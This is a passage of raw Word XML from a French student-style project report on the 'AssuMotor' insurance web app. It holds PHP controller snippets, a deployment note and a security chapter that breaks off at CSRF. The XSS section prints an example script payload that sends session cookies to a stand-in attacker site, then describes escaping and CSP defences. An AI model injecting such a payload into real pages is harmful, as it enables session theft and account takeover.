          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>isAlreadyChanged</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E2D906" w14:textId="77777777" w:rsidR="00E974B9" w:rsidRDefault="00E974B9" w:rsidP="00E974B9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AC7A91" w14:textId="77777777" w:rsidR="00E974B9" w:rsidRDefault="00E974B9" w:rsidP="00E974B9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>flashMessage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E70023" w14:textId="77777777" w:rsidR="00E974B9" w:rsidRDefault="00E974B9" w:rsidP="00E974B9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FD3B66" w14:textId="77777777" w:rsidR="00E974B9" w:rsidRDefault="00E974B9" w:rsidP="00E974B9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>// on supprime les documents de la base de données et dans le serveur</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DC751F" w14:textId="77777777" w:rsidR="00E974B9" w:rsidRPr="00CE5980" w:rsidRDefault="00E974B9" w:rsidP="00E974B9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">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setStatus</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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>statusTarget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35860186"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if</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getProcessedAt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F554A8" w14:textId="77777777" w:rsidR="00E974B9" w:rsidRPr="00CE5980" w:rsidRDefault="00E974B9" w:rsidP="00E974B9">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$subscription</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setProcessedAt</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0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DateTimeImmutable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'now'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBDAF37" w14:textId="77777777" w:rsidR="00E974B9" w:rsidRDefault="00E974B9" w:rsidP="00E974B9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00CE5980">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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF77FF7" w14:textId="77777777" w:rsidR="00E974B9" w:rsidRDefault="00E974B9" w:rsidP="00E974B9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>flashMessage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">'Le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>status</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> est mis à jour avec succès'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF4D5F0" w14:textId="77777777" w:rsidR="00E974B9" w:rsidRDefault="00E974B9" w:rsidP="00E974B9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC01C4C" w14:textId="77777777" w:rsidR="00E974B9" w:rsidRPr="00555B5E" w:rsidRDefault="00E974B9" w:rsidP="00E974B9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00555B5E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00555B5E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00555B5E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00555B5E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>flashMessage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00555B5E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0A6DB9" w14:textId="77777777" w:rsidR="00E974B9" w:rsidRPr="00555B5E" w:rsidRDefault="00E974B9" w:rsidP="00E974B9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00555B5E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B19D95" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRPr="00555B5E" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="2FF7401C" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4" w:rsidP="00E974B9">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc233817781"/>
      <w:r>
        <w:t>6.4 Documentation du déploiement</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p w14:paraId="3B6349FD" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00E974B9">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le projet </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AssuMotor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> est actuellement en phase de développement local et ne fait pas l'objet d'un déploiement en production. L'environnement d'exécution repose entièrement sur Docker Compose, ce qui permet de reproduire fidèlement les conditions de production sur n'importe quelle machine disposant de Docker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1A4440" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F" w:rsidP="00E974B9">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69B9472E" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00E974B9">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>La mise en ligne de l'application (hébergement sur un serveur distant, configuration du domaine, passage en mode APP_ENV=prod) est prévue comme étape ultérieure dans l'évolution du projet, une fois la phase de développement et de validation entièrement terminée.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F5CA66" w14:textId="77777777" w:rsidR="00851AC3" w:rsidRDefault="00851AC3"/>
    <w:p w14:paraId="03EC9A56" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4" w:rsidP="00E974B9">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:spacing w:before="0" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc233817782"/>
      <w:r>
        <w:t>7. PRÉSENTATION DES ÉLÉMENTS DE SÉCURITÉ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w14:paraId="6AE94D16" w14:textId="2CBE190B" w:rsidR="003A6B7F" w:rsidRDefault="00B90A61" w:rsidP="00752E97">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00B90A61">
        <w:t xml:space="preserve">La sécurité d'une application web est une préoccupation transversale qui doit être considérée à chaque étape du développement. Dans le cadre du projet </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B90A61">
        <w:t>AssuMotor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B90A61">
        <w:t>, quatre menaces majeures ont été identifiées comme prioritaires en raison de leur fréquence et de la sensibilité des données manipulées (données personnelles, documents d'identité, informations financières). Cette section présente chacune de ces menaces, illustre leurs risques concrets, puis détaille les contre-mesures générales à mettre en œuvre pour s'en prémunir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E34B13" w14:textId="2F0D2B72" w:rsidR="00B90A61" w:rsidRDefault="00B90A61" w:rsidP="00786344">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.1 </w:t>
      </w:r>
      <w:r w:rsidR="00786344" w:rsidRPr="00786344">
        <w:t>Identification des menaces prioritaires</w:t>
      </w:r>
      <w:r w:rsidR="00786344">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90A61">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00786344">
        <w:t>e l’application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B12EB7" w14:textId="060156AD" w:rsidR="00490839" w:rsidRPr="00786344" w:rsidRDefault="00490839" w:rsidP="00752E97">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="2E5FA3"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc233817783"/>
      <w:r w:rsidRPr="00786344">
        <w:rPr>
          <w:color w:val="2E5FA3"/>
        </w:rPr>
        <w:t xml:space="preserve">A. </w:t>
      </w:r>
      <w:r w:rsidR="003239D4" w:rsidRPr="00786344">
        <w:rPr>
          <w:color w:val="2E5FA3"/>
        </w:rPr>
        <w:t>Cross-Site Scripting (XSS)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p w14:paraId="625CBFA7" w14:textId="77777777" w:rsidR="00752E97" w:rsidRDefault="00490839" w:rsidP="00752E97">
      <w:pPr>
        <w:spacing w:before="120" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00490839">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Définition</w:t>
      </w:r>
      <w:r w:rsidR="00771995">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7469E2B3" w14:textId="0267C77D" w:rsidR="00490839" w:rsidRPr="00752E97" w:rsidRDefault="00490839" w:rsidP="00752E97">
      <w:pPr>
        <w:spacing w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00490839">
        <w:t>Le Cross-Site Scripting est une attaque qui consiste à injecter du code JavaScript malveillant dans une page web légitime. Ce code est ensuite exécuté dans le navigateur des visiteurs, dans le contexte de sécurité du site attaqué. On distingue trois types principaux : le XSS stocké (persistant en base de données), le XSS réfléchi (dans les paramètres d'URL) et le XSS basé DOM (manipulation côté client).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206CE792" w14:textId="77777777" w:rsidR="00490839" w:rsidRPr="00490839" w:rsidRDefault="00490839" w:rsidP="00490839"/>
    <w:p w14:paraId="0EB5CCF2" w14:textId="77777777" w:rsidR="00752E97" w:rsidRDefault="00490839" w:rsidP="00752E97">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00490839">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Risques et exemple concret</w:t>
      </w:r>
      <w:r w:rsidR="00771995">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2AE8A9" w14:textId="506A07B0" w:rsidR="00490839" w:rsidRDefault="00490839" w:rsidP="00752E97">
      <w:pPr>
        <w:spacing w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00490839">
        <w:t xml:space="preserve">Les conséquences d'une attaque XSS peuvent être graves : vol de cookies de session permettant l'usurpation d'identité, redirection vers un site de phishing, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00490839">
        <w:t>keylogging</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00490839">
        <w:t>, ou encore modification du contenu de la page pour tromper l'utilisateur. Un exemple typique dans un contexte assurance : un attaquant pourrait injecter dans un champ commentaire libre le code &lt;script&gt;document.location='https://site-pirate.com?c='+document.cookie&lt;/script&gt;. Si ce champ est ensuite affiché à un administrateur sans échappement, ses cookies de session seraient envoyés à l'attaquant, permettant à ce dernier de se connecter à sa place.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB711C9" w14:textId="77777777" w:rsidR="00490839" w:rsidRPr="00490839" w:rsidRDefault="00490839" w:rsidP="00771995">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CF8B1BE" w14:textId="77777777" w:rsidR="00752E97" w:rsidRDefault="00490839" w:rsidP="00752E97">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00490839">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Comment se protéger</w:t>
      </w:r>
      <w:r w:rsidR="00771995">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AB6395" w14:textId="3C470E34" w:rsidR="003A6B7F" w:rsidRDefault="00490839" w:rsidP="00752E97">
      <w:pPr>
        <w:spacing w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00490839">
        <w:t>La règle fondamentale est l'échappement systématique de toute donnée provenant de l'utilisateur avant son affichage dans une page HTML. Concrètement, chaque caractère spécial (&lt;, &gt;, ", ', &amp;) doit être converti en son équivalent HTML avant d'être renvoyé au navigateur. Il convient également d'appliquer le principe de moindre privilège : n'autoriser que les caractères et formats strictement nécessaires via des validations côté serveur, et refuser les contenus HTML dans les champs qui ne le requièrent pas. La mise en place d'une politique CSP (Content Security Policy) via les en-têtes HTTP constitue une couche de défense supplémentaire en restreignant les sources autorisées pour le chargement de scripts, empêchant ainsi l'exécution de code injecté même en cas d'échec de l'échappement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421829C3" w14:textId="51DEE0D3" w:rsidR="003A6B7F" w:rsidRPr="00C65F1A" w:rsidRDefault="00490839" w:rsidP="00752E97">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="_Toc233817784"/>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5FA3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">B. </w:t>
      </w:r>
      <w:r w:rsidR="003239D4" w:rsidRPr="00C65F1A">
        <w:rPr>
          <w:color w:val="2E5FA3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cross-Site Request Forgery (CSRF)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w14:paraId="7EECCB59" w14:textId="77777777" w:rsidR="00752E97" w:rsidRDefault="00490839" w:rsidP="00752E97">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00490839">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Définition</w:t>
      </w:r>
      <w:r w:rsidR="00D33A23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB14BB4" w14:textId="6C010A15" w:rsidR="00490839" w:rsidRDefault="00490839" w:rsidP="00752E97">
      <w:pPr>
        <w:spacing w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00490839">
